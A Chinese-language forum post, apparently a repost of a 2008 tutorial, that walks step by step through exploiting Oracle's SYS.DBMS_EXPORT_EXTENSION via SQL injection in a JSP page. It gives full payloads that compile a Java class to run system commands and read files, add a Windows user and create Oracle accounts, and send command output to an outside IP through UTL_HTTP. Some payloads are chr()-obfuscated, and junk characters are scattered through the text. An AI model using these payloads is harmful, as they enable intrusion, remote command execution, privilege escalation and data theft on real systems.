以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成 / H a) B" f% h5 K% q) E, ]
% B" N C( E- o5 h /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
: j! c2 M: Z; q. d5 R的形式即可。(用" 'a'|| "是为了让语句返回true值)
6 w8 y/ `; t% M' ~2 f+ z) e语句有点长,可能要用post提交。 6 j8 F/ V, K6 [
以下是各个步骤:
9 @6 ^- q& q& l1.创建包
4 L% t0 e# N# x( |2 f- d通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:( k+ [0 v# c$ D3 S; M
/xxx.jsp?id=1 and '1'<>'a'||(
$ O7 G+ w u" D/ w; K+ O0 F! F- jselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''8 q, B0 w7 U3 T, p: w8 Q
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
( u5 u; P2 F: p; S% B% _new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
: Q" D5 m+ k, M0 Z) ?" ^}'''';END;'';END;--','SYS',0,'1',0) from dual 3 V. z1 d; v- Y+ T% d F4 M2 x
)
/ u2 a) a3 @! D, z! L------------------------ 2 ]0 j0 Y7 ~5 a, m% Y. C
如果url有长度限制,可以把readFile()函数块去掉,即: + e" \) b/ I' D+ S" A, a- I
/xxx.jsp?id=1 and '1'<>'a'||(
! h; X, m+ i. |5 J: d! Q" cselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
. L$ r# l' P4 u8 R1 e; \8 p! ? v: acreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(8 k( E! N! W/ g" n: ^+ ~; Z$ f% h
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}7 |# S6 a1 a3 ?) x& s+ u: b
}'''';END;'';END;--','SYS',0,'1',0) from dual
" S$ e% Z& O' ~; M, _0 C)
* N* w' m8 K# X* I7 G6 Y& b( D k同时把后面步骤 提到的 对readFile()的处理语句去掉。 ( p3 D3 F% [: S2 Z9 I; ^! O+ |, V( C
------------------------------ : Z% x% ?" ^% Y6 S* E4 n. V" R
2.赋Java权限
6 g& N S$ a" a% O; }0 Yselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual3 |/ k% D' Y9 U' k
3.创建函数
& h' L% C1 \. K0 g; Eselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''', z: F i0 }6 W) m% G. R$ i; c
create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual
0 P* e( @; N8 U& {9 G% }. [select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
8 \/ L/ q7 d, Ycreate or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual
4 J0 @$ x4 C5 v% m4.赋public执行函数的权限
4 E. V* M- }3 y0 D, V* Gselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
7 r+ q' M% Z1 ~" v* \select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
J' Z% j" _$ Z8 ?5.测试上面的几步是否成功
* ~$ D* @% {) R; G1 eand '1'<>'11'||( 9 Y! f! a7 G s$ L, w! e' r
select OBJECT_ID from all_objects where object_name ='LINXRUNCMD' " ~# |$ \2 m( c4 {' d( y( m
) 6 A( a( ]% g. b$ A: U" d4 A1 ]
and '1'<>( + `6 K1 E& Y+ Z1 ?5 q' B3 D
select OBJECT_ID from all_objects where object_name ='LINXREADFILE' 3 N) b0 T$ j) d6 B
)
% D# ^; ]; u% V" D. c( Q6.执行命令:
5 r- W" `9 W$ E. h/xxx.jsp?id=1 and '1'<>( , s/ u5 n4 R5 c. T! |6 B
select sys.LinxRunCMD('cmd /c net user linx /add') from dual 6 w, W- T8 d d B2 h1 M9 A- Q- z
" m) Q3 w. X2 Z" k4 T$ V5 @) ]
)
8 ~* R& M, p" W/xxx.jsp?id=1 and '1'<>(
* W! i4 z7 e/ wselect sys.LinxReadFile('c:/boot.ini') from dual3 m6 a+ q+ P" x0 t ?: O$ O
% |8 i) R3 a8 P) D' })
7 h: V1 W2 [+ G% x6 {5 H
) o1 Y. g& |; H/ f注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。 9 f3 J) L0 a+ ]0 l1 ~3 m1 P
如果要查看运行结果可以用 union : , J: L3 n; F8 t# B' a
/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual
% R. }/ |, W, g, S: U或者UTL_HTTP.request(: ; A7 Q( S. y0 ^; q% Q5 ~6 C
/xxx.jsp?id=1 and '1'<>(
$ C' q, U# X. Q, A7 N: k% L3 J5 D! R) aSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
% j7 v8 Q5 p& M$ D* G, e# L)
, b0 x! J# T4 l& D9 y0 @/xxx.jsp?id=1 and '1'<>( 3 Z1 H" D4 c, A6 x) o
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual( e: @3 z1 G3 c' n, Z) K- j0 ^
) & t: U4 ^/ x( G, |+ X
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。
. \1 ^* e3 u4 ?) D9 E-------------------- - ]8 \, p! a: `& {. ^+ [+ l
6.内部变化
0 r S9 Y& ?, X& L通过以下命令可以查看all_objects表达改变:
8 R. d- _# i/ }9 w1 d3 {/ fselect * from all_objects where object_name like '%LINX%' or object_name like '%Linx%') X5 h) \$ |- S" ?2 j
7.删除我们创建的函数 . { Z! y% ` D3 c, S
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''3 Y3 N- t0 L( V9 W5 p+ x' I
drop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual
/ W4 U; d9 j( y/ D6 V7 f====================================================
! h) p3 z; V6 b( u全文结束。谨以此文赠与我的朋友。 ) A! i2 V: `/ h K1 h
linx
S7 V1 W( o. t5 v; P) g" p124829445 x- |$ P. O+ b1 P* `
2008.1.12
! V b; Z, c+ b' A4 \; wlinyujian@bjfu.edu.cn
9 @6 e/ ~1 J7 L====================================================================== ( U( s- ^* g1 e. ^" R4 Z/ y( [
测试漏洞的另一方法:
; r% U3 P' Q3 p' g2 ^创建oracle帐号: 5 E+ n \" C& R& _" B" f" {
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
) m4 O& W% }' {- zCREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
: O( I: V( D- u5 b0 E即: $ Y5 q6 `$ z" D3 |
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),' L( \& r* Q0 X2 n% p
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
f) Q) b5 s7 M r E. p' g7 z/ l确定漏洞存在:
8 G$ ~) Z' Y$ W4 I" f" i2 l1<>( ; D9 v/ U( p2 K1 d# ?( m: G
select user_id from all_users where username='LINXSQL'
% { T2 R* `5 D0 Q: L! E) # m" [( ~4 u$ c2 m% O: d2 |& z
给linxsql连接权限: ; N1 S, q. Y) C9 X+ q
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
) ^* Z" t8 T- r8 f" Y; S% }GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
u9 o1 `9 H% t7 S, O. C6 n删除帐号: ( v6 g# l: A9 x8 a9 k
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
$ v% W7 T# Y( O% Q6 cdrop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual % K. S/ G# g: E
======================
& \2 c& W# ]& J% U/ N2 d- \$ k以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:/ X# ~3 w% N( o% X
1.jsp?id=1 and '1'<>(
# M3 d% |" t& ~1 v' C; aselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
! {! A& H0 e. _% Q! X; Z# ?) p; @create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; '''';END;'';END;--','SYS',0,'1',0) from dual
% r9 ^: b5 @* Q% r; O; m2 Z( V) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
; ~+ x. B- a8 C: E& c% K# G+ |/ E )
. Q% N) l5 c! a! I& {2 \
' k' i& F, J* I& u; k9 B9 y, h+ W3 |0 v1 k$ s/ Z' `2 a5 }2 I7 W% ?
R) G E- D1 O% x, X
|
发表于 2012-12-18 12:21:48
收藏
支持
反对